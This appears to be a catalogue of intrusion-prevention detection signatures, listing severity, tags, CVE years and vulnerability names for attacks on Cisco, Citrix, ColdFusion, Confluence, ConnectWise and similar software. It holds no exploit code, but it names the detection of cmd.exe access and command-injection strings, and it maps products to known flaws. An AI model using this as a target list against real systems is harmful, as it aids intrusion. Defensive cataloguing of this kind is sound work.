Description:
Back to top

HTTP_CSU-CGIScript-csNews-Path-Disclosure

About this situation: Vulnerable csNews.cgi script requested
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, CGIScript.net csNews, CVE2002, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-CGIScript_Net_csNews_Path_Disclosure
Description:
Back to top

HTTP_CSU-CGIScript-csNews-System-Compromise

About this situation: CGIScript csNews
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CGIScript.net csNews, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-CGIScript.net-csNews.cgi-Eval-Perl-Code-Execution
Description:
Back to top

HTTP_CSU-CGIScript-csNewsPro-System-Compromise

About this situation: CGIScript csNewsPro
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CGIScript.net csNewsPro, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-CGIScript.net-csNewsPro.cgi-Eval-Perl-Code-Execution
Description:
Back to top

HTTP_CSU-CGIScript-csSearch-System-Compromise

About this situation: CGIScript csSearch
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, CGIScript.net csSearch, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-CGIScript.net-csSearch.cgi-Eval-Perl-Code-Execution
Description:
Back to top

HTTP_CSU-Cisco-Adaptive-Security-Appliance-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1719-5242
Vulnerability: Cisco-Adaptive-Security-Appliance-Information-Disclosure
Description:
Back to top

HTTP_CSU-Cisco-Adaptive-Security-Appliance-Unauthenticated-File-Read

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Cisco-Adaptive-Security-Appliance-Unauthenticated-File-Read
Description:
Back to top

HTTP_CSU-Cisco-ASA-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2018, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1158-5242
Vulnerability: Cisco-ASA-Directory-Traversal
Description:
Back to top

HTTP_CSU-Cisco-ASA-SSL-VPN-Privilege-Escalation

About this situation: An attempt to exploit a Cisco ASA SSL VPN Privilege Escalation vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: Cisco-ASA-SSL-VPN-Privilege-Escalation
Description:
Back to top

HTTP_CSU-Cisco-ASA-X-With-FirePOWER-Services-Authenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cisco ASA-X detected.
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Cisco Adaptive Security Appliance, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1508-5242
Vulnerability: Cisco-ASA-X-With-FirePOWER-Services-Authenticated-Command-Injection
Description:
Back to top

HTTP_CSU-Cisco-Collaboration-Server-Upload-Vulnerability

About this situation: An attempt to exploit a vulnerability in Cisco Collaboration Server was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Collaboration Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Cisco-Collaboration-Server-Upload-Vulnerability
Description:
Back to top

HTTP_CSU-Cisco-Common-Services-Devices-Center-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Cisco Systems Common Services Devices Center detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Unified Operations Manager, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Cisco-Common-Services-Devices-Center-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Cisco-Common-Services-Framework-Help-Servlet-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in CiscoWorks Common Services Framework Help Servlet
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Unified Operations Manager, Cisco Systems CiscoWorks Common Services, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Cisco-Common-Services-Framework-Help-Servlet-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Cisco-Data-Center-Network-Manager-Getlicenses-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1218-5242
Last changed: sgpkg-ips-1218-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Getlicenses-SQL-Injection
Description:
Back to top

HTTP_CSU-Cisco-Dcnm-Unauthenticated-File-Download

About this situation: An attempt to exploit a vulnerability in Cisco Data Center Network Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2019, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Cisco-Dcnm-Unauthenticated-File-Download
Description:
Back to top

HTTP_CSU-Cisco-Identity-Services-Engine-Livelogsettingsservlet-Stored-XSS

About this situation: An attempt to exploit a vulnerability in Cisco Systems Identity Services Engine detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems ISE, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1138-5242
Vulnerability: Cisco-Identity-Services-Engine-Livelogsettingsservlet-Stored-XSS
Description:
Back to top

HTTP_CSU-Cisco-IOS-HTTP-Authentication-Bypass

About this situation: Detected an attempt to exploit Cisco IOS authentication bypass vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2001, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-154-2032
Vulnerability: Cisco-IOS-HTTP-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Cisco-IOS-XE-CVE-2023-20198-Implant-Detection

About this situation: An attempt to exploit a vulnerability in Cisco IOS detected
Context: HTTP Request URI
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2023, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1642-5242
Last changed: sgpkg-ips-1642-5242
Vulnerability: Cisco-IOS-XE-CVE-2023-20198-Implant-Detection
Description: CVE References: CVE-2023-20198
Back to top

HTTP_CSU-Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198

About this situation: An attempt to exploit a vulnerability in Cisco IOS XE detected
Context: HTTP Request URI
Severity: 7
Tags: Cisco, Any Hardware, CVE2023, Cisco not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1656-5242
Last changed: sgpkg-ips-1656-5242
Vulnerability: Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198
Description:
Back to top

HTTP_CSU-Cisco-IOS-XE-Rest-API-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Cisco Systems REST API virtual service container detected
Context: HTTP Request URI
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2019, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1194-5242
Vulnerability: Cisco-IOS-XE-Rest-API-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Cisco-License-Manager-Server-Reportcsv-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems License Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems License Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Cisco-License-Manager-Server-Reportcsv-Directory-Traversal
Description:
Back to top

HTTP_CSU-Cisco-Prime-Collaboration-Provisioning-Scriptmgr-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Collaboration Provisioning detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Collaboration Provisioning, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-943-5242
Last changed: sgpkg-ips-1060-5242
Vulnerability: Cisco-Prime-Collaboration-Provisioning-Scriptmgr-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Fileuploadservlet-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Data Center Network Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2013, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Cisco-Prime-Data-Center-Network-Manager-Fileuploadservlet-Arbitrary-File-Upload
Description:
Back to top

HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Cisco Systems Prime Data Center Network Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Data Center Network Manager, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-642-5211
Vulnerability: Cisco-Prime-Data-Center-Network-Manager-Information-Disclosure
Description:
Back to top

HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Deserialization-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems Evolved Programmable Network Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Infrastructure, Cisco Systems Evolved Programmable Network Manager, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: Cisco-Prime-Infrastructure-And-Epnm-Deserialization-Code-Execution
Description:
Back to top

HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Importjobresults-XSS

About this situation: An attempt to exploit a vulnerability in Cisco Systems Evolved Programmable Network Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Infrastructure, Cisco Systems Evolved Programmable Network Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-958-5242
Last changed: sgpkg-ips-958-5242
Vulnerability: Cisco-Prime-Infrastructure-And-Epnm-Importjobresults-XSS
Description:
Back to top

HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Systempreferences_configurable-Request

About this situation: A request to a restricted file in Cisco Systems Evolved Programmable Network Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Infrastructure, Cisco Systems Evolved Programmable Network Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-949-5242
Last changed: sgpkg-ips-949-5242
Vulnerability: Cisco-Systempreferences_configurable-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Cisco-Prime-Infrastructure-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Prime Infrastructure detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Prime Infrastructure, CVE2018, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Cisco-Prime-Infrastructure-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Cisco-PVC2300-POE-Video-Camera-Configuration-Download

About this situation: An attempt to exploit a vulnerability in Cisco PVC2300 cameras detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco PVC2300 Cameras, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Cisco-PVC2300-POE-Video-Camera-Configuration-Download
Description:
Back to top

HTTP_CSU-Cisco-RV-Series-Router-Command-Execution-CVE-2023-20118

About this situation: An attempt to exploit a vulnerability in Cisco RV Series routers detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Router, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Cisco-RV-Series-Router-Command-Execution-CVE-2023-20118
Description:
Back to top

HTTP_CSU-Cisco-SA500-Series-Security-Appliances-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Cisco SA500 Series Security Appliances detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco SA500 Series Security Appliances, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Cisco-SA500-Series-Security-Appliances-SQL-Injection
Description:
Back to top

HTTP_CSU-Cisco-Webex-Magic-Url-Remote-Command-Execution

About this situation: Usage of a vulnerable Webwex Extension detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Cisco Webex Player, CVE2017, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-845-5242
Last changed: sgpkg-ips-845-5242
Vulnerability: Cisco-Webex-Magic-Url-Remote-Command-Execution
Description:
Back to top

HTTP_CSU-Cisco-Wireless-IP-Phone-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cisco Wireless IP Phone detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco IP Phone, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Cisco-Wireless-IP-Phone-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Citrix-Application-Delivery-Controller-And-Gateway-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Citrix Systems ADC and Citrix Gateway detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Citrix-Application-Delivery-Controller-And-Gateway-Information-Disclosure
Description:
Back to top

HTTP_CSU-Clearsearch

About this situation: ClearSearch traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, ClearSearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Clearsearch
Description:
Back to top

HTTP_CSU-Clorius-Controls-ICS-SCADA-Information-Disclosure-Attempt

About this situation: An attempt to exploit a vulnerability in Clorius Controls ICS SCADA detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Clorius Controls ICS SCADA, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Clorius-Controls-ICS-SCADA-Information-Disclosure
Description:
Back to top

HTTP_CSU-Cmd-Exe-System-Compromise

About this situation: Windows cmd.exe access
Context: HTTP Request URI
Severity: 10
Tags: Windows, Any Hardware, Generic HTTP server, MS2000, CVE2000, Windows not specific, Generic HTTP server not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1636-5242
Vulnerability: HTTP-IIS-Unicode-Directory-Traversal-1
HTTP-Cmd-Exe-System-Compromise
Description:
Back to top

HTTP_CSU-Cogent-DataHub-DirTrav

About this situation: Cogent DataHub Directory Traversal Vulnerability 0-day
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Cogent DataHub, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Vulnerability: Cogent-DataHub-DirTrav
Description:
Back to top

HTTP_CSU-ColdFusion-Exprcalc-File-Disclosure

About this situation: Vulnerable ColdFusion sample application exprcalc.cfm accessed
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, ColdFusion, CVE1999, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-ColdFusion-Exprcalc-File-Disclosure
Description:
Back to top

HTTP_CSU-ColdFusion-Openfile-File-Import

About this situation: Vulnerable ColdFusion sample application accessed
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ColdFusion, CVE1999, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-ColdFusion-Openfile-File-Import
Description:
Back to top

HTTP_CSU-ColdFusion-Path-Information-Disclosure

About this situation: Vulnerable ColdFusion Server default files accessed
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, ColdFusion, CVE1999, CVE2000, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1765-5242
Vulnerability: HTTP-ColdFusion-Exprcalc-File-Disclosure
HTTP-ColdFusion-Path-Information-Disclosure
Description:
Back to top

HTTP_CSU-Command-Interpreter-In-Cgi

About this situation: Call to command interpreter in CGI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, CVE1999, Any Operating System not specific, Generic HTTP server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-793-5211
Vulnerability: Command-Interpreter-In-Cgi
Description:
Back to top

HTTP_CSU-Common-Command-Injection-String

About this situation: A common command injection string in URI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1483-5242
Vulnerability: Common-Command-Injection-String
Description:
Back to top

HTTP_CSU-Common-Command-Injection-String-2

About this situation: A common command injection string in URI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1761-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Common-Command-Injection-String
Description:
Back to top

HTTP_CSU-Common-Command-Injection-String-3

About this situation: A common command injection string in URI detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Common-Command-Injection-String
Description:
Back to top

HTTP_CSU-Comtrend-CT-5624-Router-Remote-Password-Disclosure

About this situation: An attempt to exploit a vulnerability in Comtrend CT-5624 Router detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Comtrend CT-5624 Router, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Comtrend-CT-5624-Router-Remote-Password-Disclosure
Description:
Back to top

HTTP_CSU-Confluence-Access-Control-Vulnerability-CVE-2023-22515-2

About this situation: A possible attempt to exploit a vulnerability in Confluence Data Center and Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1640-5242
Last changed: sgpkg-ips-1642-5242
Vulnerability: Confluence-Access-Control-Vulnerability-CVE-2023-22515
Description:
Back to top

HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-1

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Vulnerability: Confluence-Improper-Authorization-CVE-2023-22518
Description:
Back to top

HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-2

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Vulnerability: Confluence-Improper-Authorization-CVE-2023-22518
Description:
Back to top

HTTP_CSU-Confluence-Setupadministrator.action-Endpoint-Access

About this situation: A POST request to Confluence Setupadministrator.action detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Confluence, CVE2023, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-1640-5242
Last changed: sgpkg-ips-1640-5242
Vulnerability: Confluence-Access-Control-Vulnerability-CVE-2023-22515
Description:
Back to top

HTTP_CSU-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709

About this situation: An attempt to exploit a vulnerability in ConnectWise ScreenConnect detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ConnectWise ScreenConnect, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1696-5242
Vulnerability: Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709
Description:
Back to top

HTTP_CSU-Connectwise-Screenconnect-CVE-2024-1708-Post-Exploitation-Activity

About this situation: An attempt to exploit a vulnerability in ConnectWise ScreenConnect detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ConnectWise ScreenConnect, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Vulnerability: Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708
Description:
Back to top

HTTP_CSU-CoreHTTP-Url-Buffer-Overflow

About this situation: Detected attempt to exploit a vulnerability in CoreHTTP
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, CoreHTTP, CVE2007, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
